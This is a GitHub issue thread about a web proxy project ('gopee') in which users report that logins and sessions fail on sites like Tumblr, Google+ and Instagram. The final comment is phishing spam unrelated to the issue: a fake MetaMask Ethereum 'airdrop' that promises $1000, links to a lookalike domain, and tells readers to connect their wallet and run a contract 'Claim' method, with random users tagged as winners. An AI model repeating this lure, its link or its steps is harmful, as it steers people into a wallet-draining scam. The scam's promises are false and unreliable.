### ISSUE TITLE
Sessions not stored

### ISSUE THREAD

**Issue by 0x62** [madhurjain/gopee#2]
Currently nothing using sessions (login, register etc) work correctly.

**Comment by sebie** [comment]
Yeah, but it is also because of how some websites are created. Some redirect to just `/sessions` not to the full URL `github.com/sessions`. (For example).

**Comment by snapo** [comment]
I can confirm, i tested now alot of settings with the newest build.

Twitter: works (with login and post something)
Facebook: (i dont have facebook so i cant test)
Tumblr: Does work kind off, but site is completly off (login does not work)
Google+ : Browsing Sites work (login does not work)
Instagram: Browsing Sites work (login does not work)

What i think are major sites? github, pastebin, hotmail, gmail, yahoo mail, microsoft life, google drive, skydrive, dropbox, ..... much more

So everything important to login does not work.... :-(

is there anything i could help with?

**Comment by mesidharth** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @wpank, @xcambar, @rohitmukherjee, @buxxux, @reck1ess, @Jackiexiao, @matrixjimmy
